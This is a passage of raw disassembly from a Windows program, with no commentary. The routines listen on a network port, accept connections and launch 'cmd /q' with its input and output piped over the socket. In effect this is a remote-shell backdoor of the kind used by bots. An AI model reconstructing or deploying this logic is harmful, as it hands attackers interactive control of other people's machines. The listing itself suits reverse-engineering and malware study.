push [ebp+arg_0]
call sub_40B9A7
add esp, 0Ch
push edi
call ds:dword_4F53A0 ; ExitThread
loc_4111D1: ; CODE XREF: sub_4110D4+D8�j
push 2
lea eax, [ebp+var_18]
push 4
push eax
call ds:dword_4E2F80 ; gethostbyaddr
cmp eax, edi
jnz short loc_4111FB
push [ebp+var_18]
call ds:dword_4E3054 ; inet_ntoa
push eax
lea eax, [ebp+var_B0]
push eax
call sub_41EA60
jmp short loc_411209
; ---------------------------------------------------------------------------
loc_4111FB: ; CODE XREF: sub_4110D4+10D�j
push dword ptr [eax]
lea eax, [ebp+var_B0]
push eax
call sub_41F620
loc_411209: ; CODE XREF: sub_4110D4+125�j
pop ecx
pop ecx
push edi
push ebx
push offset dword_4E5D20
push dword ptr [esi]
call ds:dword_4E3018 ; send
cmp ds:dword_4E5D18, edi
jnz short loc_41126B
push [ebp+var_18]
lea eax, [ebp+var_350]
push eax
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_2C]
push eax
call sub_41131A
add esp, 10h
test eax, eax
jnz short loc_41126B
push edi
push 13h
push offset aPermissionDeni ; "Permission denied\n"
push dword ptr [esi]
call ds:dword_4E3018 ; send
push dword ptr [esi]
call ds:dword_4E3060 ; closesocket
push [ebp+arg_0]
call sub_40B9A7
pop ecx
push edi
call ds:dword_4F53A0 ; ExitThread
loc_41126B: ; CODE XREF: sub_4110D4+14C�j
; sub_4110D4+16D�j
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_2C]
push eax
push offset unk_44B078
call sub_415AB0
push [ebp+arg_0]
call sub_4115D0
add esp, 10h
test eax, eax
jnz short loc_4112B2
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_44B0A0
call sub_415AB0
push [ebp+arg_0]
call sub_40B9A7
add esp, 0Ch
push ebx
call ds:dword_4F53A0 ; ExitThread
loc_4112B2: ; CODE XREF: sub_4110D4+1B9�j
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_2C]
push eax
push offset unk_44B0CC
call sub_415AB0
push [ebp+arg_0]
call sub_40B9A7
add esp, 10h
push edi
call ds:dword_4F53A0 ; ExitThread
sub_4110D4 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4112D9 proc near ; CODE XREF: sub_4110D4+9A�p
; sub_4110D4+A7�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_4]
loc_4112E0: ; CODE XREF: sub_4112D9+2A�j
push 0
lea eax, [ebp+arg_4+3]
push 1
push eax
push [ebp+arg_0]
call ds:dword_4E2FE0 ; recv
cmp eax, 1
jnz short loc_411316
mov al, byte ptr [ebp+arg_4+3]
mov [esi], al
inc esi
dec [ebp+arg_8]
jz short loc_41130B
test al, al
jnz short loc_4112E0
xor eax, eax
inc eax
loc_411308: ; CODE XREF: sub_4112D9+3F�j
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41130B: ; CODE XREF: sub_4112D9+26�j
push offset unk_44B0F8
call sub_415AB0
pop ecx
loc_411316: ; CODE XREF: sub_4112D9+1B�j
xor eax, eax
jmp short loc_411308
sub_4112D9 endp
; =============== S U B R O U T I N E =======================================
sub_41131A proc near ; CODE XREF: sub_4110D4+163�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push [esp+arg_0]
push [esp+4+arg_8]
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz short loc_411345
push [esp+arg_4]
push [esp+4+arg_0]
push offset unk_44B124
call sub_415AB0
add esp, 0Ch
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_411345: ; CODE XREF: sub_41131A+11�j
xor eax, eax
inc eax
retn
sub_41131A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411349 proc near ; DATA XREF: sub_401C87+235E�o
var_5DC = dword ptr -5DCh
var_5A4 = byte ptr -5A4h
var_414 = byte ptr -414h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = byte ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_24 = byte ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5A4h
mov eax, [ebp+arg_0]
push esi
push edi
push 78h
pop ecx
mov esi, eax
lea edi, [ebp+var_214]
rep movsd
xor edi, edi
inc edi
mov [eax+1DCh], edi
lea eax, [ebp+var_5A4]
push eax
push 202h
call ds:dword_4E2F38 ; WSAStartup
xor esi, esi
cmp eax, esi
jz short loc_4113A2
push eax
push offset unk_44B15C
call sub_415AB0
push [ebp+var_4C]
call sub_40B9A7
add esp, 0Ch
push edi
call ds:dword_4F53A0 ; ExitThread
loc_4113A2: ; CODE XREF: sub_411349+3A�j
push edi
push offset loc_4115C6
call ds:dword_4F53F8 ; SetConsoleCtrlHandler
test eax, eax
jnz short loc_4113DB
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_44B188
call sub_415AB0
pop ecx
pop ecx
call ds:dword_4E2F20 ; WSACleanup
push [ebp+var_4C]
call sub_40B9A7
pop ecx
push edi
call ds:dword_4F53A0 ; ExitThread
loc_4113DB: ; CODE XREF: sub_411349+67�j
push ebx
push 10h
lea eax, [ebp+var_20]
push esi
push eax
call sub_41E4B0
add esp, 0Ch
mov [ebp+var_20], 2
push [ebp+var_50]
call ds:dword_4E2FC8 ; htons
push 6
push edi
push 2
mov [ebp+var_1E], ax
mov [ebp+var_1C], esi
call ds:dword_4E3048 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_411551
mov eax, [ebp+var_4C]
push 10h
imul eax, 234h
mov ds:dword_455F0C[eax], ebx
lea eax, [ebp+var_20]
push eax
push ebx
call ds:dword_4E2FF4 ; bind
test eax, eax
jnz loc_411551
push 7FFFFFFFh
push ebx
call ds:dword_4E2FF0 ; listen
test eax, eax
jnz loc_411551
push offset unk_44B1CC
mov [ebp+var_10], 0Ch
mov [ebp+var_C], esi
mov [ebp+var_8], esi
call sub_415A3C
pop ecx
mov [ebp+arg_0], edi
loc_41146A: ; CODE XREF: sub_411349+15A�j
; sub_411349+203�j
lea eax, [ebp+var_4]
mov [ebp+var_4], 10h
push eax
lea eax, [ebp+var_34]
push eax
push ebx
call ds:dword_4E305C ; accept
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_411554
push [ebp+arg_0]
lea eax, [ebp+arg_0]
push eax
push 8
push 0FFFFh
push edi
call ds:dword_4E2FA8 ; setsockopt
cmp eax, 0FFFFFFFFh
jz short loc_41146A
movzx eax, [ebp+var_32]
push [ebp+var_4C]
mov [ebp+var_38], esi
push eax
push [ebp+var_30]
call ds:dword_4E3054 ; inet_ntoa
push eax
lea eax, [ebp+var_414]
push offset unk_44B208
push eax
call sub_41EA60
lea eax, [ebp+var_414]
push eax
call sub_415A3C
push edi
lea eax, [ebp+var_414]
push 9
push eax
call sub_40B691
mov [ebp+var_48], eax
imul eax, 234h
mov ecx, [ebp+var_4C]
add esp, 24h
mov ds:dword_455F04[eax], ecx
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_214]
push esi
push eax
push offset sub_4110D4
lea eax, [ebp+var_10]
push esi
push eax
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_48]
imul ecx, 234h
cmp eax, esi
mov ds:dword_455F14[ecx], eax
jnz short loc_411547
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_44B24C
call sub_415AB0
pop ecx
pop ecx
jmp short loc_411554
; ---------------------------------------------------------------------------
loc_41153F: ; CODE XREF: sub_411349+201�j
push 32h
call ds:dword_4F534C ; Sleep
loc_411547: ; CODE XREF: sub_411349+1DF�j
cmp [ebp+var_38], esi
jz short loc_41153F
jmp loc_41146A
; ---------------------------------------------------------------------------
loc_411551: ; CODE XREF: sub_411349+C8�j
; sub_411349+EC�j ...
mov edi, [ebp+arg_0]
loc_411554: ; CODE XREF: sub_411349+13C�j
; sub_411349+1F4�j
call ds:dword_4E2F5C ; WSAGetLastError
push eax
lea eax, [ebp+var_414]
push offset unk_44B288
push eax
call sub_41EA60
add esp, 0Ch
cmp [ebp+var_3C], esi
jnz short loc_411594
push esi
lea eax, [ebp+var_414]
push [ebp+var_40]
push eax
lea eax, [ebp+var_210]
push eax
push [ebp+var_214]
call sub_409C75
add esp, 14h
loc_411594: ; CODE XREF: sub_411349+229�j
lea eax, [ebp+var_414]
push eax
call sub_415A3C
pop ecx
push edi
call ds:dword_4E3060 ; closesocket
push ebx
call ds:dword_4E3060 ; closesocket
call ds:dword_4E2F20 ; WSACleanup
push [ebp+var_4C]
call sub_40B9A7
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
pop ebx
loc_4115C6: ; DATA XREF: sub_411349+5A�o
xor eax, eax
cmp [esp+5E0h+var_5DC], eax
setz al
retn
sub_411349 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4115D0 proc near ; CODE XREF: sub_4110D4+1AF�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push edi
call sub_411725
imul edi, 234h
mov esi, eax
xor ebx, ebx
mov eax, ds:dword_455F0C[edi]
mov [ebp+var_C], 0Ch
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [esi+0Ch], eax
mov edi, ds:dword_4F5350
pop ecx
lea eax, [ebp+arg_0]
push eax
push ebx
push esi
push offset sub_4118F7
lea eax, [ebp+var_C]
push ebx
push eax
call edi ; CreateThread
cmp eax, ebx
mov [esi+10h], eax
jnz short loc_41163F
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_44B2C0
call sub_415AB0
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
xor eax, eax
jmp loc_41171F
; ---------------------------------------------------------------------------
loc_41163F: ; CODE XREF: sub_4115D0+50�j
lea eax, [ebp+arg_0]
push eax
push ebx
push esi
push offset sub_411995
lea eax, [ebp+var_C]
push ebx
push eax
call edi ; CreateThread
cmp eax, ebx
mov [esi+14h], eax
jnz short loc_411680
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_44B308
call sub_415AB0
pop ecx
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
push ebx
push dword ptr [esi+14h]
call ds:dword_4F5380 ; TerminateThread
xor eax, eax
jmp loc_411720
; ---------------------------------------------------------------------------
loc_411680: ; CODE XREF: sub_4115D0+86�j
mov eax, [esi+10h]
push 0FFFFFFFFh
mov [ebp+var_18], eax
mov eax, [esi+14h]
mov [ebp+var_14], eax
mov eax, [esi+8]
mov [ebp+var_10], eax
lea eax, [ebp+var_18]
push ebx
push eax
push 3
call ds:dword_4F53FC ; WaitForMultipleObjects
sub eax, ebx
jz short loc_4116DA
dec eax
jz short loc_4116D4
dec eax
jz short loc_4116C0
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_44B350
call sub_415AB0
pop ecx
pop ecx
jmp short loc_4116EF
; ---------------------------------------------------------------------------
loc_4116C0: ; CODE XREF: sub_4115D0+D9�j
mov edi, ds:dword_4F5380
push ebx
push dword ptr [esi+14h]
call edi ; TerminateThread
push ebx
push dword ptr [esi+10h]
call edi ; TerminateThread
jmp short loc_4116EF
; ---------------------------------------------------------------------------
loc_4116D4: ; CODE XREF: sub_4115D0+D6�j
push ebx
push dword ptr [esi+10h]
jmp short loc_4116DE
; ---------------------------------------------------------------------------
loc_4116DA: ; CODE XREF: sub_4115D0+D3�j
push ebx
push dword ptr [esi+14h]
loc_4116DE: ; CODE XREF: sub_4115D0+108�j
call ds:dword_4F5380 ; TerminateThread
push 1
push dword ptr [esi+8]
call ds:dword_4F53C4 ; TerminateProcess
loc_4116EF: ; CODE XREF: sub_4115D0+EE�j
; sub_4115D0+102�j
push dword ptr [esi+10h]
mov edi, ds:off_4F533C
call edi ; sub_50B3D5
push dword ptr [esi+14h]
call edi ; sub_50B3D5
push dword ptr [esi+8]
call edi ; sub_50B3D5
push dword ptr [esi]
call edi ; sub_50B3D5
push dword ptr [esi+4]
call edi ; sub_50B3D5
push dword ptr [esi+0Ch]
call ds:dword_4E3060 ; closesocket
push esi
call sub_41C9D0
xor eax, eax
inc eax
loc_41171F: ; CODE XREF: sub_4115D0+6A�j
pop ecx
loc_411720: ; CODE XREF: sub_4115D0+AB�j
pop edi
pop esi
pop ebx
leave
retn
sub_4115D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411725 proc near ; CODE XREF: sub_4115D0+D�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
xor edi, edi
push 18h
mov [ebp+var_4], edi
mov [ebp+var_8], edi
call sub_41BE40
mov esi, eax
pop ecx
cmp esi, edi
jz loc_41180F
mov ebx, ds:dword_4F53D0
lea eax, [ebp+var_14]
push edi
push eax
lea eax, [ebp+var_8]
mov [esi], edi
push eax
mov [esi+4], edi
push esi
mov [ebp+var_14], 0Ch
mov [ebp+var_10], edi
mov [ebp+var_C], 1
call ebx ; CreatePipe
mov edi, ds:off_4F533C
test eax, eax
jnz short loc_411788
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_44B388
jmp short loc_4117A8
; ---------------------------------------------------------------------------
loc_411788: ; CODE XREF: sub_411725+53�j
lea eax, [ebp+var_14]
push 0
push eax
lea eax, [esi+4]
push eax
lea eax, [ebp+var_4]
push eax
call ebx ; CreatePipe
test eax, eax
jnz short loc_4117B0
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_44B3C8
loc_4117A8: ; CODE XREF: sub_411725+61�j
call sub_415AB0
pop ecx
jmp short loc_4117DE
; ---------------------------------------------------------------------------
loc_4117B0: ; CODE XREF: sub_411725+75�j
push [ebp+arg_0]
push [ebp+var_8]
push [ebp+var_4]
call sub_41181E
add esp, 0Ch
mov [esi+8], eax
push [ebp+var_4]
call edi ; sub_50B3D5
push [ebp+var_8]
call edi ; sub_50B3D5
cmp dword ptr [esi+8], 0
jnz short loc_411813
push offset unk_44B408
call sub_415A3C
loc_4117DE: ; CODE XREF: sub_411725+89�j
cmp [ebp+var_4], 0
pop ecx
jz short loc_4117EA
push [ebp+var_4]
call edi ; sub_50B3D5
loc_4117EA: ; CODE XREF: sub_411725+BE�j
cmp [ebp+var_8], 0
jz short loc_4117F5
push [ebp+var_8]
call edi ; sub_50B3D5
loc_4117F5: ; CODE XREF: sub_411725+C9�j
mov eax, [esi]
test eax, eax
jz short loc_4117FE
push eax
call edi ; sub_50B3D5
loc_4117FE: ; CODE XREF: sub_411725+D4�j
mov eax, [esi+4]
test eax, eax
jz short loc_411808
push eax
call edi ; sub_50B3D5
loc_411808: ; CODE XREF: sub_411725+DE�j
push esi
call sub_41C9D0
pop ecx
loc_41180F: ; CODE XREF: sub_411725+1D�j
xor eax, eax
jmp short loc_411819
; ---------------------------------------------------------------------------
loc_411813: ; CODE XREF: sub_411725+AD�j
or dword ptr [esi+0Ch], 0FFFFFFFFh
mov eax, esi
loc_411819: ; CODE XREF: sub_411725+EC�j
pop edi
pop esi
pop ebx
leave
retn
sub_411725 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41181E proc near ; CODE XREF: sub_411725+94�p
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 58h
push ebx
push esi
push edi
push 44h
pop edi
xor esi, esi
push edi
lea eax, [ebp+var_58]
push esi
push eax
mov [ebp+var_4], esi
call sub_41E4B0
push 10h
lea eax, [ebp+var_14]
push esi
push eax
call sub_41E4B0
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
add esp, 18h
mov [ebp+var_20], eax
lea eax, [ebp+var_18]
mov [ebp+var_58], edi
mov edi, ds:dword_4F53CC
push esi
push 1
push 2
push eax
mov [ebp+var_54], esi
mov [ebp+var_4C], esi
mov [ebp+var_50], esi
mov [ebp+var_3C], esi
mov [ebp+var_40], esi
mov [ebp+var_44], esi
mov [ebp+var_48], esi
mov [ebp+var_28], si
mov [ebp+var_24], esi
mov [ebp+var_26], si
mov [ebp+var_2C], 101h
mov [ebp+var_1C], ebx
call edi ; GetCurrentProcess
push eax
push ebx
call edi ; GetCurrentProcess
push eax
call ds:dword_4F53C8 ; DuplicateHandle
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_58]
push eax
push esi
push esi
push esi
push 1
push esi
push esi
push offset aCmdQ ; "cmd /q"
push esi
call ds:dword_4F5340 ; CreateProcessA
test eax, eax
jz short loc_4118DA
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_C]
imul eax, 234h
push [ebp+var_10]
mov esi, [ebp+var_14]
mov ds:dword_455F08[eax], ecx
call ds:off_4F533C
jmp short loc_4118F0
; ---------------------------------------------------------------------------
loc_4118DA: ; CODE XREF: sub_41181E+9A�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_44B438
call sub_415AB0
mov esi, [ebp+var_4]
pop ecx
pop ecx
loc_4118F0: ; CODE XREF: sub_41181E+BA�j
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_41181E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4118F7 proc near ; DATA XREF: sub_4115D0+3F�o
var_1B0 = byte ptr -1B0h
var_C8 = byte ptr -0C8h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1B0h
push ebx
mov ebx, ds:off_4F53BC
push esi
push edi
mov edi, [ebp+arg_0]
jmp short loc_41195A
; ---------------------------------------------------------------------------
loc_41190E: ; CODE XREF: sub_4118F7+7B�j
xor eax, eax
xor dl, dl
xor esi, esi
cmp [ebp+arg_0], eax
jbe short loc_411943
loc_411919: ; CODE XREF: sub_4118F7+4A�j
mov cl, [ebp+esi+var_C8]
cmp cl, 0Ah
jnz short loc_411933
cmp dl, 0Dh
jz short loc_411933
mov [ebp+eax+var_1B0], 0Dh
inc eax
loc_411933: ; CODE XREF: sub_4118F7+2C�j
; sub_4118F7+31�j
mov [ebp+eax+var_1B0], cl
inc eax
inc esi
mov dl, cl
cmp esi, [ebp+arg_0]
jb short loc_411919
loc_411943: ; CODE XREF: sub_4118F7+20�j
push 0
push eax
lea eax, [ebp+var_1B0]
push eax
push dword ptr [edi+0Ch]
call ds:dword_4E3018 ; send
test eax, eax
jle short loc_411974
loc_41195A: ; CODE XREF: sub_4118F7+15�j
lea eax, [ebp+arg_0]
push 0
push eax
lea eax, [ebp+var_C8]
push 0C8h
push eax
push dword ptr [edi]
call ebx ; sub_50B3FC
test eax, eax
jnz short loc_41190E
loc_411974: ; CODE XREF: sub_4118F7+61�j
mov esi, ds:dword_4F5360
call esi ; RtlGetLastWin32Error
cmp eax, 6Dh
jz short loc_411990
call esi ; RtlGetLastWin32Error
push eax
push offset unk_44B470
call sub_415AB0
pop ecx
pop ecx
loc_411990: ; CODE XREF: sub_4118F7+88�j
pop edi
pop esi
pop ebx
leave
retn
sub_4118F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411995 proc near ; DATA XREF: sub_4115D0+75�o
var_DC = byte ptr -0DCh
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0DCh
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_0]
xor esi, esi
mov [ebp+var_10], ebx
jmp loc_411A8E
; ---------------------------------------------------------------------------
loc_4119B0: ; CODE XREF: sub_411995+10E�j
cmp [ebp+var_10], ebx
jbe short loc_4119BD
dec [ebp+var_10]
jmp loc_411A91
; ---------------------------------------------------------------------------
loc_4119BD: ; CODE XREF: sub_411995+1E�j
mov al, byte ptr [ebp+arg_0+3]
movsx ecx, al
cmp ecx, 0FFh
jz loc_411A79
cmp al, 8
mov [ebp+var_C], ebx
jz short loc_411A2D
cmp al, 7Fh
jz short loc_411A2D
cmp al, 3
jnz short loc_4119E8
push ebx
push ebx
call ds:dword_4F5400 ; GenerateConsoleCtrlEvent
jmp short loc_411A54
; ---------------------------------------------------------------------------
loc_4119E8: ; CODE XREF: sub_411995+47�j
cmp al, 15h
jnz short loc_411A0A
xor esi, esi
mov [ebp+var_8], 20h
mov [ebp+var_7], 58h
mov [ebp+var_6], 58h
mov [ebp+var_5], 58h
mov [ebp+var_4], 0Dh
mov [ebp+var_3], 0Ah
push 6
jmp short loc_411A40
; ---------------------------------------------------------------------------
loc_411A0A: ; CODE XREF: sub_411995+55�j
xor ecx, ecx
mov [ebp+esi+var_DC], al
inc esi
inc ecx
cmp al, 0Dh
mov [ebp+var_8], al
jnz short loc_411A41
mov [ebp+esi+var_DC], 0Ah
mov [ebp+var_7], 0Ah
inc esi
push 2
jmp short loc_411A40
; ---------------------------------------------------------------------------
loc_411A2D: ; CODE XREF: sub_411995+3F�j
; sub_411995+43�j
cmp esi, ebx
jbe short loc_411A57
dec esi
mov [ebp+var_8], 8
mov [ebp+var_7], 20h
mov [ebp+var_6], 8
push 3
loc_411A40: ; CODE XREF: sub_411995+73�j
; sub_411995+96�j
pop ecx
loc_411A41: ; CODE XREF: sub_411995+85�j
push ebx
lea eax, [ebp+var_8]
push ecx
push eax
push dword ptr [edi+0Ch]
call ds:dword_4E3018 ; send
test eax, eax
jle short loc_411AA9
loc_411A54: ; CODE XREF: sub_411995+51�j
mov al, byte ptr [ebp+arg_0+3]
loc_411A57: ; CODE XREF: sub_411995+9A�j
cmp al, 0Dh
jnz short loc_411A91
lea eax, [ebp+var_14]
push ebx
push eax
lea eax, [ebp+var_DC]
push esi
push eax
push dword ptr [edi+4]
call ds:dword_4F53B4 ; WriteFile
test eax, eax
jz short loc_411AA9
xor esi, esi
jmp short loc_411A91
; ---------------------------------------------------------------------------
loc_411A79: ; CODE XREF: sub_411995+34�j
cmp [ebp+var_C], ebx
jnz short loc_411A87
mov [ebp+var_C], 1
jmp short loc_411A91
; ---------------------------------------------------------------------------
loc_411A87: ; CODE XREF: sub_411995+E7�j
mov [ebp+var_10], 0Ah
loc_411A8E: ; CODE XREF: sub_411995+16�j
mov [ebp+var_C], ebx
loc_411A91: ; CODE XREF: sub_411995+23�j
; sub_411995+C4�j ...
push ebx
lea eax, [ebp+arg_0+3]
push 1
push eax
push dword ptr [edi+0Ch]
call ds:dword_4E2FE0 ; recv
test eax, eax
jg loc_4119B0
loc_411AA9: ; CODE XREF: sub_411995+BD�j
; sub_411995+DE�j
pop edi
pop esi
pop ebx
leave
retn
sub_411995 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411AAE proc near ; DATA XREF: sub_401C87+2C00�o
var_2D4 = byte ptr -2D4h
var_D4 = dword ptr -0D4h
var_D0 = byte ptr -0D0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 10h
mov esi, eax
pop ebx
lea edi, [ebp+var_D4]
push 2Ch
mov [ebp+var_4], ebx
pop ecx
rep movsd
xor edi, edi
xor esi, esi
inc edi
push ebx
mov [eax+0A8h], edi
lea eax, [ebp+var_14]
push esi
push eax
call sub_41E4B0
add esp, 0Ch
mov [ebp+var_14], 2
push [ebp+var_40]
call ds:dword_4E2FC8 ; htons
push 6
push edi
push 2
mov [ebp+var_12], ax
mov [ebp+var_10], esi
call ds:dword_4E3048 ; socket
mov edi, eax
mov eax, [ebp+var_3C]
imul eax, 234h
push ebx
mov ds:dword_455F0C[eax], edi
lea eax, [ebp+var_14]
push eax
push edi
call ds:dword_4E2FF4 ; bind
test eax, eax
jnz loc_411C4F
push 0Ah
push edi
call ds:dword_4E2FF0 ; listen
test eax, eax
jnz loc_411C4F
push [ebp+var_40]
push [ebp+var_D4]
call sub_40AEAD
pop ecx
push eax
lea eax, [ebp+var_2D4]
push offset dword_44B4B0
push eax
call sub_41EA60
add esp, 10h
cmp [ebp+var_30], esi
jnz short loc_411B89
push esi
lea eax, [ebp+var_2D4]
push [ebp+var_34]
push eax
lea eax, [ebp+var_D0]
push eax
push [ebp+var_D4]
call sub_409C75
add esp, 14h
loc_411B89: ; CODE XREF: sub_411AAE+B9�j
; sub_411AAE+18A�j ...
lea eax, [ebp+var_2D4]
push eax
call sub_415A3C
pop ecx
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
push edi
call ds:dword_4E305C ; accept
push [ebp+var_3C]
mov ebx, eax
movzx eax, [ebp+var_22]
push eax
mov [ebp+var_28], esi
push [ebp+var_20]
call ds:dword_4E3054 ; inet_ntoa
push eax
lea eax, [ebp+var_2D4]
push offset dword_44B4D8
push eax
call sub_41EA60
push ebx
lea eax, [ebp+var_2D4]
push 19h
push eax
call sub_40B691
mov [ebp+var_38], eax
imul eax, 234h
mov ecx, [ebp+var_3C]
add esp, 20h
mov ds:dword_455F04[eax], ecx
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_D4]
push esi
push eax
push offset sub_411CB2
push esi
push esi
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_38]
imul ecx, 234h
cmp eax, esi
mov ds:dword_455F14[ecx], eax
jnz short loc_411C45
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2D4]
push offset dword_44B51C
push eax
call sub_41EA60
add esp, 0Ch
jmp loc_411B89
; ---------------------------------------------------------------------------
loc_411C3D: ; CODE XREF: sub_411AAE+19A�j
push 5
call ds:dword_4F534C ; Sleep
loc_411C45: ; CODE XREF: sub_411AAE+16D�j
cmp [ebp+var_28], esi
jz short loc_411C3D
jmp loc_411B89
; ---------------------------------------------------------------------------
loc_411C4F: ; CODE XREF: sub_411AAE+7B�j
; sub_411AAE+8C�j
push edi
call ds:dword_4E3060 ; closesocket
push [ebp+var_40]
lea eax, [ebp+var_2D4]
push offset dword_44B558
push eax
call sub_41EA60
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_411C92
push esi
lea eax, [ebp+var_2D4]
push [ebp+var_34]
push eax
lea eax, [ebp+var_D0]
push eax
push [ebp+var_D4]
call sub_409C75
add esp, 14h
loc_411C92: ; CODE XREF: sub_411AAE+1C2�j
lea eax, [ebp+var_2D4]
push eax
call sub_415A3C
push [ebp+var_3C]
call sub_40B9A7
pop ecx
pop ecx
push esi
call ds:dword_4F53A0 ; ExitThread
pop edi
pop esi
pop ebx
sub_411AAE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411CB2 proc near ; DATA XREF: sub_411AAE+14F�o
var_5D4 = dword ptr -5D4h
var_5D0 = dword ptr -5D0h
var_4D0 = byte ptr -4D0h
var_4CF = byte ptr -4CFh
var_4CE = word ptr -4CEh
var_4CC = dword ptr -4CCh
var_4C8 = byte ptr -4C8h
var_C8 = byte ptr -0C8h
var_44 = byte ptr -44h
var_2C = dword ptr -2Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5D4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 2Ch
mov esi, eax
pop ecx
lea edi, [ebp+var_C8]
rep movsd
mov esi, [ebp+var_2C]
xor edi, edi
mov [ebp+arg_0], esi
imul esi, 234h
inc edi
lea esi, dword_455F0C[esi]
mov [eax+0ACh], edi
xor ebx, ebx
mov eax, [esi]
mov [ebp+var_8], 5
mov [ebp+var_5D0], eax
lea eax, [ebp+var_8]
push eax
push ebx
lea eax, [ebp+var_5D4]
push ebx
push eax
push ebx
mov [ebp+var_4], ebx
mov [ebp+var_5D4], edi
call ds:dword_4E2FB0 ; select
test eax, eax
jnz short loc_411D33
push dword ptr [esi]
